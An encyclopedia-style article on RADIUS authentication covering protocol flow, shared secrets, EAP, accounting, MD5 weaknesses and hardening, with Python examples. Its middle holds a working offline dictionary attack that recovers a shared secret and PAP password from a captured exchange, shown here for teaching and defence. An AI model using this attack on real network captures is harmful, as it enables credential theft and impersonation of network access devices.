# RADIUS Authentication
Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized Authentication, Authorization, and Accounting (AAA) management for users connecting to network services. Originally designed for dial-up access in the 1990s, RADIUS has evolved into the dominant protocol for enterprise network access control, governing connections to wireless networks, VPNs, network switches, and remote access systems.
RADIUS addresses a fundamental scaling problem in network security: how to maintain consistent access control across hundreds or thousands of network access points without duplicating user databases on every device. Before RADIUS, network administrators had to manually configure user accounts on each access device (modems, switches, wireless access points). This approach became unworkable as networks grew larger and more complex. RADIUS centralizes this function by placing all user authentication data on dedicated RADIUS servers while allowing network access devices to remain lightweight clients.
The protocol operates as the enforcement engine for network access policies in most enterprise environments. When a user attempts to connect to a corporate Wi-Fi network, authenticate to a VPN gateway, or log into a network switch, RADIUS determines whether that connection is authorized. It integrates with existing identity systems like Active Directory, LDAP directories, and certificate authorities, making it the translation layer between network infrastructure and enterprise identity management.
RADIUS fills a critical gap in network security architecture. While firewalls control traffic flow and intrusion detection systems monitor network behavior, RADIUS controls who gets network access in the first place. This positioning makes RADIUS configuration a primary attack vector for lateral movement and privilege escalation, since compromising RADIUS authentication often grants an attacker legitimate network credentials.
RADIUS implements a client-server architecture where network access servers (NAS) function as RADIUS clients. The NAS devices include wireless access points, VPN concentrators, network switches with 802.1X port authentication, and remote access servers. These clients forward authentication requests to centralized RADIUS servers, which maintain user databases and authentication policies.
The authentication process begins when a user initiates a network connection. The NAS collects the user's credentials (a username and password for PAP or CHAP, or the EAP messages exchanged with the supplicant for certificate-based and tunnelled methods) and packages them into a RADIUS Access-Request packet. The packet carries the User-Name, either a User-Password attribute (for PAP, hidden with the shared secret rather than encrypted in any modern sense) or EAP-Message attributes, an identifier for the NAS (NAS-IP-Address or NAS-Identifier), and session attributes such as the client's MAC address in Calling-Station-Id. The NAS sends this packet to the configured RADIUS server over UDP port 1812 (some older deployments still use 1645).
The RADIUS server receives the Access-Request and validates the credentials against its user database. This database can be local to the RADIUS server or integrated with external systems like Active Directory through LDAP, Kerberos, or other authentication mechanisms. Based on the validation result and configured policies, the server responds with one of three packet types: Access-Accept (authentication successful), Access-Reject (authentication failed), or Access-Challenge (additional information required, such as a second authentication factor).
If the server sends an Access-Accept packet, it can include RADIUS attributes that define the user's authorized network access. These attributes control session duration, bandwidth limits, VLAN assignment, firewall rules, and other network policies. For wireless connections, RADIUS attributes might specify which SSID the user can access or what encryption keys to use. For VPN connections, attributes might define which internal networks are reachable or what IP address to assign.
The shared secret is the cryptographic foundation of RADIUS security. Each RADIUS client (NAS) and server pair shares a secret configured on both devices, and it serves two functions: message authentication and password hiding. Contrary to a common assumption, a plain Access-Request is not authenticated by the secret at all in RFC 2865: its 16-byte Request Authenticator is a random value chosen by the NAS. Only the reply is authenticated, through a Response Authenticator computed as MD5 over the reply's code, identifier and length, the Request Authenticator, the reply attributes, and the secret. Authenticating the request itself depends on the optional Message-Authenticator attribute defined in RFC 2869, an HMAC-MD5 over the packet keyed with the secret; it is mandatory when EAP is carried, and servers should be configured to require it from every client. The User-Password attribute is hidden by padding the password to a multiple of 16 bytes and XORing the first block with MD5(secret + Request Authenticator) and each later block with MD5(secret + previous ciphertext block), so its confidentiality rests entirely on the strength of the secret.
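The exchange described in the preceding paragraphs, as an added example that is not code from the original page: a NAS builds a PAP Access-Request with the User-Password hidden exactly as described and a Message-Authenticator appended; the server verifies the HMAC, checks the credentials against a constructed user table, and answers with an Access-Accept carrying VLAN tunnel attributes (RFC 2868) whose Response Authenticator the NAS then verifies. The shared secret, user, password, NAS address and VLAN are constructed values; the packet layouts follow RFC 2865, RFC 2868 and RFC 2869.

```python
"""RADIUS PAP Access-Request / Access-Accept exchange (RFC 2865, 2868, 2869)."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, MESSAGE_AUTHENTICATOR = 1, 2, 4, 80
TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE, TUNNEL_PRIVATE_GROUP_ID = 64, 65, 81  # RFC 2868
USERS = {b"alice": (b"correct horse", b"20")}  # constructed: username -> (password, VLAN)


def hide_password(password, secret, request_auth):
    """RFC 2865 5.2: pad to a 16-byte multiple; XOR block 1 with MD5(secret + Request
    Authenticator) and each later block with MD5(secret + previous ciphertext block)."""
    padded = password.ljust(max(16, -(-len(password) // 16) * 16), b"\x00")
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + block, block
    return out

def unhide_password(hidden, secret, request_auth):
    """Inverse of hide_password: the keystream chains on ciphertext, so no state is needed."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        out += bytes(c ^ k for c, k in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")

def encode_attrs(attrs):
    """Attributes are type(1) length(1, header included) value."""
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)

def decode_attrs(data):
    attrs, i = [], 0
    while i < len(data):
        t, l = data[i], data[i + 1]
        if l < 2 or i + l > len(data):
            raise ValueError("malformed attribute")
        attrs.append((t, data[i + 2:i + l]))
        i += l
    return attrs

def build_access_request(ident, username, password, secret, nas_ip=b"\x0a\x00\x00\x01"):
    """NAS side. The Request Authenticator is random; integrity comes only from the
    Message-Authenticator, an HMAC-MD5 over the packet with that attribute's value zeroed."""
    request_auth = os.urandom(16)
    attrs = encode_attrs([(USER_NAME, username), (USER_PASSWORD, hide_password(password, secret, request_auth)),
                          (NAS_IP_ADDRESS, nas_ip), (MESSAGE_AUTHENTICATOR, b"\x00" * 16)])
    pkt = struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + request_auth + attrs
    return pkt[:-16] + hmac.new(secret, pkt, hashlib.md5).digest()  # it is the last attribute

def verify_message_authenticator(pkt, secret):
    """Server side. A request without the attribute is treated as unauthenticated."""
    i = 20
    while i + 2 <= len(pkt):
        t, l = pkt[i], pkt[i + 1]
        if l < 2:
            return False
        if t == MESSAGE_AUTHENTICATOR and l == 18:
            zeroed = pkt[:i + 2] + b"\x00" * 16 + pkt[i + 18:]
            return hmac.compare_digest(hmac.new(secret, zeroed, hashlib.md5).digest(), pkt[i + 2:i + 18])
        i += l
    return False

def build_response(code, ident, request_auth, attrs, secret):
    """Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return header + hashlib.md5(header + request_auth + attrs + secret).digest() + attrs

def verify_response(resp, request_auth, secret):
    """NAS side: binds the reply to the request it sent and to the shared secret."""
    expected = hashlib.md5(resp[:4] + request_auth + resp[20:] + secret).digest()
    return hmac.compare_digest(expected, resp[4:20])

def handle_access_request(pkt, secret):
    """Server side: returns the reply, or None to drop the packet silently (RFC 2865 section 3)."""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if code != ACCESS_REQUEST or length != len(pkt) or not verify_message_authenticator(pkt, secret):
        return None
    request_auth, attrs = pkt[4:20], dict(decode_attrs(pkt[20:]))
    password = unhide_password(attrs.get(USER_PASSWORD, b""), secret, request_auth)
    entry = USERS.get(attrs.get(USER_NAME, b""))
    if entry is None or not hmac.compare_digest(entry[0], password):
        return build_response(ACCESS_REJECT, ident, request_auth, b"", secret)
    # VLAN assignment: tag byte 0, Tunnel-Type 13 (VLAN), Tunnel-Medium-Type 6 (IEEE 802).
    vlan = encode_attrs([(TUNNEL_TYPE, b"\x00\x00\x00\x0d"), (TUNNEL_MEDIUM_TYPE, b"\x00\x00\x00\x06"),
                         (TUNNEL_PRIVATE_GROUP_ID, b"\x00" + entry[1])])
    return build_response(ACCESS_ACCEPT, ident, request_auth, vlan, secret)

if __name__ == "__main__":
    secret = b"example-shared-secret"  # constructed
    req = build_access_request(7, b"alice", b"correct horse", secret)
    resp = handle_access_request(req, secret)
    print("reply code", resp[0], "authentic:", verify_response(resp, req[4:20], secret))
    print("forged request dropped:",
          handle_access_request(build_access_request(8, b"alice", b"correct horse", b"wrong"), secret) is None)
```

Two points are worth noticing when running it. The server drops a request built with the wrong secret only because it insists on a valid Message-Authenticator; without that check, the Request Authenticator gives it nothing to verify and the only consequence of a wrong secret would be a garbled password. And the NAS's verify_response is what stops an on-path host from answering with a forged Access-Accept, which is why both sides must use constant-time comparison and why the secret must be long and random rather than a word.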
RADIUS accounting operates in parallel with authentication on UDP port 1813 (1646 in older deployments). Every accounting message is an Accounting-Request packet, distinguished by its Acct-Status-Type attribute. When a session begins, the NAS sends a Start record with the session details; during the session it may send Interim-Update records with usage counters; when the session ends it sends a Stop record with final data including duration, bytes transferred, and the Acct-Terminate-Cause. Unlike an Access-Request, an Accounting-Request is authenticated: its Request Authenticator is MD5 over the packet (with the authenticator field zeroed) followed by the shared secret, and the server acknowledges each record with an Accounting-Response. This accounting data supports billing, compliance reporting, and security monitoring.
Extensible Authentication Protocol (EAP) integration extends RADIUS beyond simple username-password authentication. EAP defines a framework for multiple authentication methods, including EAP-TLS (certificate-based), PEAP (EAP inside a server-authenticated TLS tunnel), and EAP-TTLS (tunnelled TLS). When EAP is used, the NAS is the pass-through authenticator: it relays EAP messages between the supplicant and the RADIUS server inside EAP-Message attributes (RFC 3579) without interpreting them, while the RADIUS server terminates the EAP conversation as the EAP server, using an Access-Challenge for each round trip and returning the negotiated keying material (for 802.1X, the MS-MPPE-Recv-Key and MS-MPPE-Send-Key attributes) in the final Access-Accept. This allows RADIUS infrastructure to support smart card authentication, certificate-based machine authentication, and other advanced mechanisms, and the TLS-based methods also keep the user's credentials out of the RADIUS packets themselves, which plain PAP does not.
RADIUS proxy configurations enable distributed authentication across multiple organizations or geographic regions. A RADIUS proxy server receives authentication requests and forwards them to appropriate backend RADIUS servers based on realm information in the username (such as user@company.com). This capability supports roaming access agreements between organizations and simplifies authentication in large, geographically distributed enterprises.
High availability RADIUS deployments typically implement multiple RADIUS servers in primary-secondary or load-balanced configurations. NAS devices are configured with multiple RADIUS server addresses and automatically fail over if the primary server becomes unreachable. RADIUS server clusters can share user databases and configuration to ensure consistent authentication policies across all servers.
RADIUS authentication controls the network access chokepoint that determines whether unauthorized users can reach enterprise resources. When RADIUS fails or is compromised, the impact cascades across all network access mechanisms: wireless networks, VPN connections, administrative access to switches and routers, and 802.1X port authentication on wired networks. This broad scope makes RADIUS availability and security critical to overall enterprise security posture.
The protocol's cryptographic weaknesses create significant attack surface. Every integrity and hiding mechanism in RADIUS is built on MD5, which is cryptographically obsolete. Collision attacks are the relevant threat to integrity: practical chosen-prefix collisions against MD5 have been used to forge an Access-Accept for an Access-Request that carries no Message-Authenticator (the Blast-RADIUS attack published in 2024), letting an attacker on the path between NAS and server turn a rejection into an acceptance. Rainbow tables are not the relevant threat to passwords, because the User-Password hiding is a keystream derived from the shared secret rather than a hash of the password; the weak point there is the secret. Other attributes, including the username, Calling-Station-Id and NAS identity, travel in plaintext. Shared secrets are often weak or reused across many NAS devices, amplifying the impact of a single compromise. An attacker who captures one Access-Request and its reply can mount an offline dictionary attack on the secret, checking each candidate by recomputing the Response Authenticator, and once the secret is known can recover every PAP password on the wire and impersonate either the NAS or the server.
Man-in-the-middle attacks against RADIUS are particularly dangerous because the protocol provides neither confidentiality nor any authentication of the peer beyond knowledge of the shared secret: there are no certificates, no key exchange, and no protection for the plaintext attributes. An attacker who can intercept RADIUS traffic can read usernames and session metadata, attempt to recover the secret offline, and, where the Message-Authenticator attribute is not required, inject or modify responses. The wireless analogue of this problem sits on the other side of the NAS: a rogue access point can present its own EAP server to clients that do not validate the server certificate, so supplicant configuration matters as much as the RADIUS hop itself.
Shared secret management represents the most common RADIUS security failure point. Organizations frequently use the same shared secret across hundreds of access points and switches, creating a single point of failure. Default or weak shared secrets are common, particularly on wireless access points where configuration complexity leads to shortcuts. When shared secrets are compromised, attackers can impersonate legitimate NAS devices and capture authentication credentials from legitimate users.
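To make the preceding paragraphs concrete, an added example that is not part of the original page: from one captured Access-Request and its Access-Accept, the Response Authenticator lets each candidate secret be tested offline, and once the secret is found the PAP password in the request can be unhidden. The capture is constructed inside the block (it simulates the NAS and server with a deliberately weak secret) and the wordlist is constructed; nothing is sent on the network, so the server never sees a failed attempt.

```python
"""Offline dictionary attack on a RADIUS shared secret from one captured exchange,
then recovery of the PAP password that the secret was hiding."""
import hashlib
import os


def response_authenticator(resp, request_auth, secret):
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(resp[:4] + request_auth + resp[20:] + secret).digest()


def find_attr(pkt, attr_type):
    """Return the value of the first attribute of the given type, or None."""
    i = 20
    while i + 2 <= len(pkt):
        t, l = pkt[i], pkt[i + 1]
        if l < 2:
            return None
        if t == attr_type:
            return pkt[i + 2:i + l]
        i += l
    return None


def crack_shared_secret(request, response, wordlist):
    """Each candidate costs one MD5; the check is entirely offline."""
    request_auth = request[4:20]
    for candidate in wordlist:
        if response_authenticator(response, request_auth, candidate) == response[4:20]:
            return candidate
    return None


def recover_pap_password(request, secret):
    """Undo the RFC 2865 section 5.2 hiding for the first 16-byte block (passwords up to
    16 bytes; longer passwords chain the keystream on the previous ciphertext block)."""
    hidden = find_attr(request, 2)  # User-Password
    keystream = hashlib.md5(secret + request[4:20]).digest()
    return bytes(c ^ k for c, k in zip(hidden[:16], keystream)).rstrip(b"\x00")


def constructed_capture(secret, username, password):
    """Builds the Access-Request/Access-Accept pair a sniffer between NAS and server
    would see. Constructed for this example; it stands in for a pcap."""
    request_auth = os.urandom(16)
    keystream = hashlib.md5(secret + request_auth).digest()
    hidden = bytes(p ^ k for p, k in zip(password.ljust(16, b"\x00"), keystream))
    attrs = bytes([1, 2 + len(username)]) + username + bytes([2, 18]) + hidden
    request = bytes([1, 42]) + (20 + len(attrs)).to_bytes(2, "big") + request_auth + attrs
    header = bytes([2, 42, 0, 20])  # Access-Accept, identifier 42, no attributes
    return request, header + response_authenticator(header, request_auth, secret)


if __name__ == "__main__":
    # Constructed wordlist; "testing123" is the example secret in the FreeRADIUS clients.conf.
    wordlist = [b"radius", b"secret", b"Password1", b"testing123", b"changeme"]
    req, resp = constructed_capture(b"testing123", b"bob", b"hunter2")
    secret = crack_shared_secret(req, resp, wordlist)
    print("secret:", secret, "user:", find_attr(req, 1), "password:", recover_pap_password(req, secret))
```

The Message-Authenticator attribute does not change this: it is keyed with the same secret, so it only gives the attacker a second oracle. An attacker with an account of their own does not even need the reply, since knowing the plaintext password turns the User-Password hiding itself into the check. The defences are the ones the page names: a long random secret per NAS, and IPsec or RadSec so that the packets are never observable in the first place.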
RADIUS server compromise has far-reaching consequences because these servers often integrate with core enterprise identity systems. A compromised RADIUS server can potentially access Active Directory credentials, certificate stores, and user databases. The centralized nature that makes RADIUS operationally efficient also makes it a high-value target for attackers seeking to establish persistent network access.
Accounting data stored on RADIUS servers represents both a security asset and a privacy risk. Detailed logs of user connections, session durations, and data usage patterns can support incident response and forensic investigations. However, this same data can reveal sensitive information about user behavior, location patterns, and business operations if improperly secured or accessed by unauthorized parties.
RADIUS authentication falls within both the Identity Access and Trust (IAT) and Systems Prevention and Hardening (SPH) domains of the Persistent Defense Methodology. The protocol's dual role as an identity verification mechanism and a network access control point requires coordinated analysis across both domains to achieve comprehensive security.
From the IAT perspective, RADIUS represents a critical identity federation chokepoint where enterprise authentication systems interface with network infrastructure. CDA methodology emphasizes that RADIUS servers should never be trusted to maintain authoritative identity data, instead operating as verification proxies that forward authentication decisions to authoritative identity stores. This approach aligns with Zero Possession Architecture principles where RADIUS servers possess authentication credentials only temporarily during the verification process.
SPH domain analysis focuses on RADIUS as network infrastructure that must be hardened against direct attack and configuration exploitation. CDA campaigns systematically examine shared secret strength, rotation policies, and distribution mechanisms. Unlike conventional approaches that treat shared secrets as long-lived configuration parameters, CDA methodology advocates for programmatic secret rotation with integration into certificate management systems where possible.
CDA's approach to RADIUS differs significantly from traditional network security thinking in its rejection of trust-based configuration. Conventional RADIUS deployments often rely on network segmentation and access control lists to protect RADIUS traffic, operating on the assumption that internal network communication is inherently secure. CDA methodology applies "trust nothing" principles by requiring encrypted transport for all RADIUS communication, typically through IPsec tunnels or RadSec (RADIUS over TLS) implementations.
The "possess nothing" principle drives CDA RADIUS architecture toward stateless authentication where RADIUS servers do not maintain persistent session data or user credential caches. This approach reduces the attack surface associated with RADIUS server compromise and simplifies the security boundary analysis required for C-BUILD campaigns.
CDA methodology treats RADIUS accounting data as operational intelligence that must be verified rather than trusted. Conventional approaches often accept RADIUS accounting logs as authoritative records of network access and user behavior. CDA analysis correlates RADIUS accounting with independent data sources like DHCP logs, wireless association events, and network flow monitoring to verify the integrity of access control decisions.
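The correlation just described, as an added example that is not code from the original page: RADIUS accounting Start records are matched against DHCP lease events by client MAC address, flagging hosts that obtained a lease with no authenticated session behind it, sessions whose Framed-IP-Address disagrees with the address DHCP actually issued, and sessions with no lease at all. Both inputs are constructed samples (one accounting record per line as attribute=value pairs, and ISC dhcpd-style syslog lines); the five-minute matching window and the year 2024 assumed for the syslog timestamps are assumptions.

```python
"""Cross-check RADIUS accounting Start records against DHCP lease events."""
import re
from datetime import datetime, timedelta

# Constructed sample data, not real logs.
ACCOUNTING = """\
2024-05-01T09:00:05 Acct-Status-Type=Start User-Name=alice Calling-Station-Id=AA-BB-CC-DD-EE-01 Framed-IP-Address=10.1.20.15 NAS-IP-Address=10.0.0.2 Acct-Session-Id=5f1a01
2024-05-01T09:02:10 Acct-Status-Type=Start User-Name=bob Calling-Station-Id=AA-BB-CC-DD-EE-02 Framed-IP-Address=10.1.20.16 NAS-IP-Address=10.0.0.2 Acct-Session-Id=5f1a02
2024-05-01T09:40:00 Acct-Status-Type=Stop User-Name=alice Calling-Station-Id=AA-BB-CC-DD-EE-01 Framed-IP-Address=10.1.20.15 NAS-IP-Address=10.0.0.2 Acct-Session-Id=5f1a01
"""
DHCP = """\
May  1 09:00:07 dhcp1 dhcpd[1234]: DHCPACK on 10.1.20.15 to aa:bb:cc:dd:ee:01 (alice-laptop) via eth1
May  1 09:02:12 dhcp1 dhcpd[1234]: DHCPACK on 10.1.20.17 to aa:bb:cc:dd:ee:02 (bob-laptop) via eth1
May  1 09:15:30 dhcp1 dhcpd[1234]: DHCPACK on 10.1.20.18 to aa:bb:cc:dd:ee:03 via eth1
"""
DHCP_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ dhcpd\[\d+\]: "
                     r"DHCPACK on (?P<ip>\d+\.\d+\.\d+\.\d+) to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})")


def normalize_mac(mac):
    """Calling-Station-Id formatting varies by NAS vendor; fold the two common forms."""
    return mac.lower().replace("-", ":")


def parse_accounting(text, status="Start"):
    records = []
    for line in text.splitlines():
        ts, rest = line.split(" ", 1)
        f = dict(kv.split("=", 1) for kv in rest.split())
        if f.get("Acct-Status-Type") == status:
            records.append({"time": datetime.fromisoformat(ts), "user": f["User-Name"],
                            "mac": normalize_mac(f["Calling-Station-Id"]), "ip": f.get("Framed-IP-Address")})
    return records


def parse_dhcp(text, year=2024):
    """Syslog lines carry no year; 2024 is assumed for the constructed sample."""
    leases = []
    for line in text.splitlines():
        m = DHCP_RE.match(line)
        if m:
            t = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            leases.append({"time": t, "ip": m["ip"], "mac": m["mac"]})
    return leases


def correlate(starts, leases, window=timedelta(minutes=5)):
    """A lease is explained by a Start for the same MAC within `window` before it."""
    findings, matched = [], set()
    for lease in leases:
        session = next((s for s in starts if s["mac"] == lease["mac"]
                        and timedelta(0) <= lease["time"] - s["time"] <= window), None)
        if session is None:
            findings.append(("lease_without_session", lease["mac"], lease["ip"]))
            continue
        matched.add(session["mac"])
        if session["ip"] and session["ip"] != lease["ip"]:
            findings.append(("framed_ip_mismatch", session["user"], session["ip"], lease["ip"]))
    findings += [("session_without_lease", s["user"], s["mac"]) for s in starts if s["mac"] not in matched]
    return findings


if __name__ == "__main__":
    for finding in correlate(parse_accounting(ACCOUNTING), parse_dhcp(DHCP)):
        print(*finding)
```

On the sample, bob's NAS reported a Framed-IP-Address that DHCP never issued, and the host ee:03 received a lease without any accounting Start, which is exactly the class of discrepancy (a port or SSID that bypasses 802.1X, a NAS that lost its accounting configuration, or a spoofed address) that accounting alone cannot reveal. In production the same join is usually run in the SIEM, and the wireless controller's association log is added as a third source with the same MAC key.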
During C-BUILD campaigns, CDA operators evaluate RADIUS configurations through infrastructure enumeration and policy analysis. This examination identifies misconfigurations like weak shared secrets, inadequate EAP method selection, and improper integration with backend authentication systems. The analysis extends beyond RADIUS servers themselves to include NAS device configurations, network path security, and integration touchpoints with enterprise identity systems.
• RADIUS centralizes network access authentication but creates a high-value attack target requiring robust cryptographic protection and careful shared secret management
• MD5-based password encryption in RADIUS is cryptographically weak, making strong shared secrets and encrypted transport (IPsec or RadSec) essential for security
• EAP integration enables advanced authentication methods like certificate-based EAP-TLS, which should be preferred over password-based authentication where possible
• RADIUS accounting data provides valuable security monitoring capabilities but must be correlated with independent sources to verify integrity and detect compromise
• CDA methodology requires stateless RADIUS architecture with programmatic secret rotation and encrypted transport to align with Zero Possession Architecture principles
• 802.1X Network Access Control
• Active Directory Integration Security
• Certificate-Based Authentication
• Enterprise Wireless Security Architecture
• Network Access Control (NAC) Systems
• Rigney, C., et al. "Remote Authentication Dial In User Service (RADIUS)." RFC 2865, Internet Engineering Task Force, 2000.
• National Institute of Standards and Technology. "Guidelines for the Selection, Configuration, and Use of Transport Layer Security (TLS) Implementations." NIST SP 800-52 Rev. 2, 2019.
• Aboba, B., et al. "Extensible Authentication Protocol (EAP)." RFC 3748, Internet Engineering Task Force, 2004.
• SANS Institute. "Securing Wireless LANs: A SANS Whitepaper." SANS Reading Room, 2019.